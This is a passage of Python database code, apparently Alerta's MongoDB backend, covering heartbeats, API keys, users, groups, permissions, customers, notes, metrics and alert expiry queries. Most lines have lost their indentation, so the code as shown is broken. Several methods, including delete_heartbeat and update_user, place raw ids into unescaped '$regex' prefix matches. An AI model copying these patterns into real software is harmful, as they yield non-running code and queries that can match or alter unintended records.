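        # HEARTBEAT_MAX_LATENCY.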
pipeline = [{'$match': query.where}]
if status:
pipeline.extend([
{'$addFields': {'timeoutInMs': {'$multiply': ['$timeout', 1000]}}},
{'$addFields': {'isExpired': {'$gt': [{'$subtract': [datetime.utcnow(), '$receiveTime']}, '$timeoutInMs']}}},
{'$addFields': {'isSlow': {'$gt': [{'$subtract': ['$receiveTime', '$createTime']}, max_latency]}}}
])
match_or = list()
if HeartbeatStatus.OK in status:
match_or.append({'isExpired': False, 'isSlow': False})
if HeartbeatStatus.Expired in status:
match_or.append({'isExpired': True})
if HeartbeatStatus.Slow in status:
match_or.append({'isExpired': False, 'isSlow': True})
pipeline.append({'$match': {'$or': match_or}})
pipeline.extend([
{'$sort': {k: v for k, v in query.sort}},
{'$skip': (page - 1) * page_size},
{'$limit': page_size}
])
return self.get_db().heartbeats.aggregate(pipeline)
def get_heartbeats_count(self, query=None):
query = query or Query()
return self.get_db().heartbeats.count_documents(query.where)
def delete_heartbeat(self, id):
response = self.get_db().heartbeats.delete_one({'_id': {'$regex': '^' + id}})
        return response.deleted_count == 1
# API KEYS
# save
def create_key(self, key):
data = {
'_id': key.id,
'key': key.key,
'user': key.user,
'scopes': key.scopes,
'text': key.text,
'expireTime': key.expire_time,
'count': key.count,
'lastUsedTime': key.last_used_time
}
if key.customer:
data['customer'] = key.customer
if self.get_db().keys.insert_one(data).inserted_id == key.id:
return data
# get
def get_key(self, key, user=None):
query = {'$or': [{'key': key}, {'_id': key}]}
if user:
query['user'] = user
return self.get_db().keys.find_one(query)
# list
def get_keys(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().keys.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_keys_by_user(self, user):
return self.get_db().keys.find({'user': user})
def get_keys_count(self, query=None):
query = query or Query()
return self.get_db().keys.count_documents(query.where)
def update_key(self, key, **kwargs):
return self.get_db().keys.find_one_and_update(
{'$or': [{'key': key}, {'_id': key}]},
update={'$set': kwargs},
return_document=ReturnDocument.AFTER
)
# update
def update_key_last_used(self, key):
return self.get_db().keys.update_one(
{'$or': [{'key': key}, {'_id': key}]},
{
'$set': {'lastUsedTime': datetime.utcnow()},
'$inc': {'count': 1}
}
).matched_count == 1
# delete
def delete_key(self, key):
query = {'$or': [{'key': key}, {'_id': key}]}
response = self.get_db().keys.delete_one(query)
        return response.deleted_count == 1
# USERS
def create_user(self, user):
data = {
'_id': user.id,
'name': user.name,
'login': user.login,
'password': user.password,
'email': user.email,
'status': user.status,
'roles': user.roles,
'attributes': user.attributes,
'createTime': user.create_time,
'lastLogin': user.last_login,
'text': user.text,
'updateTime': user.update_time,
'email_verified': user.email_verified
}
if self.get_db().users.insert_one(data).inserted_id == user.id:
return data
# get
def get_user(self, id):
query = {'_id': id}
return self.get_db().users.find_one(query)
# list
def get_users(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().users.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_users_count(self, query=None):
query = query or Query()
return self.get_db().users.count_documents(query.where)
def get_user_by_username(self, username):
if not username:
return
query = {'$or': [{'login': username}, {'email': username}]}
return self.get_db().users.find_one(query)
def get_user_by_email(self, email):
if not email:
return
query = {'email': email}
return self.get_db().users.find_one(query)
def get_user_by_hash(self, hash):
query = {'hash': hash}
return self.get_db().users.find_one(query)
def update_last_login(self, id):
return self.get_db().users.update_one(
{'_id': id},
update={'$set': {'lastLogin': datetime.utcnow()}}
).matched_count == 1
def update_user(self, id, **kwargs):
update = dict()
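        # 'attributes' get special handling: non-null values are set via dotted
        # paths ('attributes.<key>') and null values are translated into '$unset',
        # so individual attributes can be removed without replacing the whole map.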
if 'attributes' in kwargs:
update['$set'] = {k: v for k, v in kwargs.items() if k != 'attributes'}
set_value = {'attributes.' + k: v for k, v in kwargs['attributes'].items() if v is not None}
if set_value:
update['$set'].update(set_value)
unset_value = {'attributes.' + k: v for k, v in kwargs['attributes'].items() if v is None}
if unset_value:
update['$unset'] = unset_value
else:
update['$set'] = kwargs
return self.get_db().users.find_one_and_update(
{'_id': {'$regex': '^' + id}}, update=update, return_document=ReturnDocument.AFTER
)
def update_user_attributes(self, id, old_attrs, new_attrs):
"""
        Merge new attributes into the existing ones; any attribute whose value is null (None) is removed.
"""
from alerta.utils.collections import merge
merge(old_attrs, new_attrs)
attrs = {k: v for k, v in old_attrs.items() if v is not None}
update = {
'$set': {'attributes': attrs}
}
response = self.get_db().users.update_one({'_id': {'$regex': '^' + id}}, update=update)
return response.matched_count > 0
def delete_user(self, id):
response = self.get_db().users.delete_one({'_id': id})
        return response.deleted_count == 1
def set_email_hash(self, id, hash):
return self.get_db().users.update_one(
{'_id': id},
update={'$set': {'hash': hash, 'updateTime': datetime.utcnow()}}
).matched_count == 1
# GROUPS
def create_group(self, group):
data = {
'_id': group.id,
'name': group.name,
'text': group.text
}
if self.get_db().groups.insert_one(data).inserted_id == group.id:
return data
def get_group(self, id):
query = {'_id': id}
return self.get_db().groups.find_one(query)
def get_groups(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().groups.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_groups_count(self, query=None):
query = query or Query()
return self.get_db().groups.count_documents(query.where)
def get_group_users(self, id):
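        # Join the group's member ids against the users collection with '$lookup'
        # and flatten each match into a small user summary dict.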
pipeline = [
{'$match': {'_id': id}},
{'$unwind': '$users'},
{'$lookup': {
'from': 'users',
'localField': 'users',
'foreignField': '_id',
'as': 'groupUser'
}},
{'$project': {'groupUser': 1}} # u.id, u.login, u.email, u.name, u.status
]
responses = self.get_db().groups.aggregate(pipeline)
users = list()
for response in responses:
users.append(
{
'id': response['groupUser'][0]['_id'],
'login': response['groupUser'][0].get('login'),
'email': response['groupUser'][0]['email'],
'name': response['groupUser'][0]['name'],
'status': response['groupUser'][0]['status']
}
)
return users
def update_group(self, id, **kwargs):
return self.get_db().groups.find_one_and_update(
{'_id': id},
update={'$set': kwargs},
return_document=ReturnDocument.AFTER
)
def add_user_to_group(self, group, user):
response = self.get_db().groups.update_one(
{'_id': group}, {'$addToSet': {'users': user}})
return response.matched_count > 0
def remove_user_from_group(self, group, user):
response = self.get_db().groups.update_one({'_id': group}, {'$pullAll': {'users': [user]}})
return response.matched_count > 0
def delete_group(self, id):
response = self.get_db().groups.delete_one({'_id': id})
        return response.deleted_count == 1
def get_groups_by_user(self, user):
return self.get_db().groups.find({'users': user})
# PERMISSIONS
def create_perm(self, perm):
data = {
'_id': perm.id,
'match': perm.match,
'scopes': perm.scopes
}
if self.get_db().perms.insert_one(data).inserted_id == perm.id:
return data
def get_perm(self, id):
query = {'_id': id}
return self.get_db().perms.find_one(query)
def get_perms(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().perms.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_perms_count(self, query=None):
query = query or Query()
return self.get_db().perms.count_documents(query.where)
def update_perm(self, id, **kwargs):
return self.get_db().perms.find_one_and_update(
{'_id': id},
update={'$set': kwargs},
return_document=ReturnDocument.AFTER
)
def delete_perm(self, id):
response = self.get_db().perms.delete_one({'_id': id})
        return response.deleted_count == 1
def get_scopes_by_match(self, login, matches):
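        # Admin users and admin roles short-circuit to the full admin scope set;
        # otherwise scopes accumulate from the configured role defaults plus any
        # per-role entries in the 'perms' collection, deduplicated at the end.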
if login in current_app.config['ADMIN_USERS']:
return ADMIN_SCOPES
scopes = list()
for match in matches:
if match in current_app.config['ADMIN_ROLES']:
return ADMIN_SCOPES
if match in current_app.config['USER_ROLES']:
scopes.extend(current_app.config['USER_DEFAULT_SCOPES'])
if match in current_app.config['GUEST_ROLES']:
scopes.extend(current_app.config['GUEST_DEFAULT_SCOPES'])
response = self.get_db().perms.find_one({'match': match}, projection={'scopes': 1, '_id': 0})
if response:
scopes.extend(response['scopes'])
return sorted(set(scopes))
# CUSTOMERS
def create_customer(self, customer):
data = {
'_id': customer.id,
'match': customer.match,
'customer': customer.customer
}
if self.get_db().customers.insert_one(data).inserted_id == customer.id:
return data
def get_customer(self, id):
query = {'_id': id}
return self.get_db().customers.find_one(query)
def get_customers(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().customers.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_customers_count(self, query=None):
query = query or Query()
return self.get_db().customers.count_documents(query.where)
def update_customer(self, id, **kwargs):
return self.get_db().customers.find_one_and_update(
{'_id': id},
update={'$set': kwargs},
return_document=ReturnDocument.AFTER
)
def delete_customer(self, id):
response = self.get_db().customers.delete_one({'_id': id})
        return response.deleted_count == 1
def get_customers_by_match(self, login, matches):
if login in current_app.config['ADMIN_USERS']:
return '*' # all customers
customers = []
for match in [login] + matches:
for r in self.get_db().customers.find({'match': match}):
customers.append(r['customer'])
if customers:
if '*' in customers:
return '*' # all customers
return customers
raise NoCustomerMatch(f"No customer lookup configured for user '{login}' or '{','.join(matches)}'")
# NOTES
def create_note(self, note):
data = {
'_id': note.id,
'text': note.text,
'user': note.user,
'attributes': note.attributes,
'type': note.note_type,
'createTime': note.create_time,
'updateTime': note.update_time,
'alert': note.alert
}
if note.customer:
data['customer'] = note.customer
if self.get_db().notes.insert_one(data).inserted_id == note.id:
return data
def get_note(self, id):
query = {'_id': id}
return self.get_db().notes.find_one(query)
def get_notes(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().notes.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_alert_notes(self, id, page=None, page_size=None):
if len(id) == 8:
query = {'alert': {'$regex': '^' + id}}
else:
query = {'alert': id}
return self.get_db().notes.find(query).skip((page - 1) * page_size).limit(page_size)
def get_customer_notes(self, customer, page=None, page_size=None):
return self.get_db().notes.find({'customer': customer}).skip((page - 1) * page_size).limit(page_size)
def update_note(self, id, **kwargs):
kwargs['updateTime'] = datetime.utcnow()
return self.get_db().notes.find_one_and_update(
{'_id': id},
update={'$set': kwargs},
return_document=ReturnDocument.AFTER
)
def delete_note(self, id):
response = self.get_db().notes.delete_one({'_id': id})
        return response.deleted_count == 1
# METRICS
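    # Metrics are stored one document per (group, name) and maintained with
    # atomic find_one_and_update upserts, so counters and timers can be
    # incremented safely.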
def get_metrics(self, type=None):
query = {'type': type} if type else {}
return list(self.get_db().metrics.find(query, {'_id': 0}))
def set_gauge(self, gauge):
return self.get_db().metrics.find_one_and_update(
{
'group': gauge.group,
'name': gauge.name
},
{
'$set': {
'group': gauge.group,
'name': gauge.name,
'title': gauge.title,
'description': gauge.description,
'value': gauge.value,
'type': 'gauge'
}
},
upsert=True,
return_document=ReturnDocument.AFTER
)['value']
def inc_counter(self, counter):
return self.get_db().metrics.find_one_and_update(
{
'group': counter.group,
'name': counter.name
},
{
'$set': {
'group': counter.group,
'name': counter.name,
'title': counter.title,
'description': counter.description,
'type': 'counter'
},
'$inc': {'count': counter.count}
},
upsert=True,
return_document=ReturnDocument.AFTER
)['count']
def update_timer(self, timer):
return self.get_db().metrics.find_one_and_update(
{
'group': timer.group,
'name': timer.name
},
{
'$set': {
'group': timer.group,
'name': timer.name,
'title': timer.title,
'description': timer.description,
'type': 'timer'
},
'$inc': {'count': timer.count, 'totalTime': timer.total_time}
},
upsert=True,
return_document=ReturnDocument.AFTER
)
# HOUSEKEEPING
def get_expired(self, expired_threshold, info_threshold):
# delete 'closed' or 'expired' alerts older than "expired_threshold" seconds
# and 'informational' alerts older than "info_threshold" seconds
if expired_threshold:
expired_seconds_ago = datetime.utcnow() - timedelta(seconds=expired_threshold)
self.get_db().alerts.delete_many(
{'status': {'$in': ['closed', 'expired']}, 'lastReceiveTime': {'$lt': expired_seconds_ago}})
if info_threshold:
info_seconds_ago = datetime.utcnow() - timedelta(seconds=info_threshold)
self.get_db().alerts.delete_many({'severity': alarm_model.DEFAULT_INFORM_SEVERITY, 'lastReceiveTime': {'$lt': info_seconds_ago}})
# get list of alerts to be newly expired
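        # An alert is due to expire when lastReceiveTime plus its timeout (falling
        # back to ALERT_TIMEOUT, converted to ms) is in the past; a timeout of 0
        # means the alert never expires and is excluded by the final '$match'.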
pipeline = [
{'$match': {'status': {'$nin': ['expired']}}},
{'$addFields': {
'computedTimeout': {'$multiply': [{'$ifNull': ['$timeout', current_app.config['ALERT_TIMEOUT']]}, 1000]}
}},
{'$addFields': {
'isExpired': {'$lt': [{'$add': ['$lastReceiveTime', '$computedTimeout']}, datetime.utcnow()]}
}},
{'$match': {'isExpired': True, 'computedTimeout': {'$ne': 0}}}
]
return self.get_db().alerts.aggregate(pipeline)
def get_unshelve(self):
# get list of alerts to be unshelved
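        # Keep only the most recent 'shelve' history entry per alert, then flag
        # alerts whose shelve timeout (falling back to SHELVE_TIMEOUT) has elapsed
        # since updateTime; a timeout of 0 means the alert stays shelved.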
pipeline = [
{'$match': {'status': 'shelved'}},
{'$unwind': '$history'},
{'$match': {
'history.type': 'shelve',
'history.status': 'shelved'
}},
{'$sort': {'history.updateTime': -1}},
{'$group': {
'_id': '$_id',
'resource': {'$first': '$resource'},
'event': {'$first': '$event'},
'environment': {'$first': '$environment'},
'severity': {'$first': '$severity'},
'correlate': {'$first': '$correlate'},
'status': {'$first': '$status'},
'service': {'$first': '$service'},
'group': {'$first': '$group'},
'value': {'$first': '$value'},
'text': {'$first': '$text'},
'tags': {'$first': '$tags'},
'attributes': {'$first': '$attributes'},
'origin': {'$first': '$origin'},
'type': {'$first': '$type'},
'createTime': {'$first': '$createTime'},
'timeout': {'$first': '$timeout'},
'rawData': {'$first': '$rawData'},
'customer': {'$first': '$customer'},
'duplicateCount': {'$first': '$duplicateCount'},
'repeat': {'$first': '$repeat'},
'previousSeverity': {'$first': '$previousSeverity'},
'trendIndication': {'$first': '$trendIndication'},
'receiveTime': {'$first': '$receiveTime'},
'lastReceiveId': {'$first': '$lastReceiveId'},
'lastReceiveTime': {'$first': '$lastReceiveTime'},
'updateTime': {'$first': '$updateTime'},
'history': {'$first': '$history'},
}},
{'$addFields': {
'computedTimeout': {'$multiply': [{'$ifNull': ['$history.timeout', current_app.config['SHELVE_TIMEOUT']]}, 1000]}
}},
{'$addFields': {
'isExpired': {'$lt': [{'$add': ['$updateTime', '$computedTimeout']}, datetime.utcnow()]}
}},
{'$match': {'isExpired': True, 'computedTimeout': {'$ne': 0}}}
]
return self.get_db().alerts.aggregate(pipeline)
def get_unack(self):
# get list of alerts to be unack'ed
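        # Same approach as get_unshelve() but for 'ack' history entries and the
        # ACK_TIMEOUT fallback.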
pipeline = [
{'$match': {'status': 'ack'}},
{'$unwind': '$history'},
{'$match': {
'history.type': 'ack',
'history.status': 'ack'
}},
{'$sort': {'history.updateTime': -1}},
{'$group': {
'_id': '$_id',
'resource': {'$first': '$resource'},
'event': {'$first': '$event'},
'environment': {'$first': '$environment'},
'severity': {'$first': '$severity'},
'correlate': {'$first': '$correlate'},
'status': {'$first': '$status'},
'service': {'$first': '$service'},
'group': {'$first': '$group'},
'value': {'$first': '$value'},
'text': {'$first': '$text'},
'tags': {'$first': '$tags'},
'attributes': {'$first': '$attributes'},
'origin': {'$first': '$origin'},
'type': {'$first': '$type'},
'createTime': {'$first': '$createTime'},
'timeout': {'$first': '$timeout'},
'rawData': {'$first': '$rawData'},
'customer': {'$first': '$customer'},
'duplicateCount': {'$first': '$duplicateCount'},
'repeat': {'$first': '$repeat'},
'previousSeverity': {'$first': '$previousSeverity'},
'trendIndication': {'$first': '$trendIndication'},
'receiveTime': {'$first': '$receiveTime'},
'lastReceiveId': {'$first': '$lastReceiveId'},
'lastReceiveTime': {'$first': '$lastReceiveTime'},
'updateTime': {'$first': '$updateTime'},
'history': {'$first': '$history'},
}},
{'$addFields': {
'computedTimeout': {'$multiply': [{'$ifNull': ['$history.timeout', current_app.config['ACK_TIMEOUT']]}, 1000]}
}},
{'$addFields': {
'isExpired': {'$lt': [{'$add': ['$updateTime', '$computedTimeout']}, datetime.utcnow()]}
}},
{'$match': {'isExpired': True, 'computedTimeout': {'$ne': 0}}}
]
return self.get_db().alerts.aggregate(pipeline)